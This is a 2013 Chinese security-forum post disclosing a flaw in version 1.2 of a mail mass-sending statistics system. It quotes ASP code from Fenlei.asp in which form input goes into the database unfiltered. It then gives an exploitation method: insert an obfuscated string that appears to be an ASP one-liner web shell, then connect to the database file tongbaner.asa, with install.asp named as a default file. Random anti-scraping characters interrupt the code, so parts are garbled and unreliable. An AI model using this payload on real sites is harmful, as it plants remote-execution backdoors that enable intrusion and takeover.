找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1998|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp 8 \5 [! R: b5 b$ L& Z1 t

) ~* C. I3 e5 e+ Q! T  f( RIF Request.QueryString("Action")="del" Then
% B. a7 m6 U1 K0 h7 ]: ^ID=Request.QueryString("ID") & Y# D% Y. i: n9 M* `
IF Countss ("tui","Fenlei",ID )<>0 then
! c- |$ y0 \& E'略 3 X7 o2 ?0 `1 n
IF Request.QueryString("Action")="Add" Then 3 z7 f! I9 A1 `# u, A% u4 ~
Tname=Request.Form("Typename") 9 p$ f; q/ T' F( X6 S
Set Rs=Server.CreateObject("adodb.Recordset") 0 h# Y, e3 @7 c; I
Sql="Select * From Fenlei Order by id Desc " 5 P# N" }& Y& P/ z' A
Rs.Open Sql,Conn,1,3
$ d. ^- [! X! i2 }8 z# L- i5 GRs.Addnew 6 b2 q7 \. j1 k' K- q* i/ {& D
Rs("Typename")=Tname 2 z& u6 l- W0 B# Z2 Y( p- W6 o8 U+ ~
'略 7 z$ D8 F$ i; r1 |
Set Rs=Server.CreateObject("adodb.Recordset")
" _1 l5 `8 s6 G, i2 kSql="Select * From Fenlei Order by id Desc "
* ~" l0 @% \! M  l8 uRs.Open Sql,Conn,1,1   b/ T7 K$ @  R# u
'略
$ r2 Q5 [5 {+ |, j9 N, W%>
2 M! e( W- x  ]4 B5 Q$ ?" |* {
* k& h7 t3 y+ o0 u, _/ d
% x+ \& p  _+ a" |! J : ~2 y- X0 i( p$ ?! ]
没有过滤,直接写入数据库。
; V* |% [. A- a
5 K9 `) y0 d1 n: w2 U6 L利用方法:% Y* O( m9 _1 y5 f  r

1 ]3 }+ o, ^( L) P  O5 {插入:┼攠數畣整爠煥敵瑳∨≡┩>
  `$ q3 {! U/ J # ^' I: c& b3 U6 s$ ~" I

! V7 c2 P+ b' F, p: z连接: http://www.xxx.com/###tongbaner.asa
6 x. M0 A+ s4 B; |5 W'默认安装文件: 6 r/ e7 _4 h' ^; c9 u
'install.asp: w' F4 G+ f6 q/ [( m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表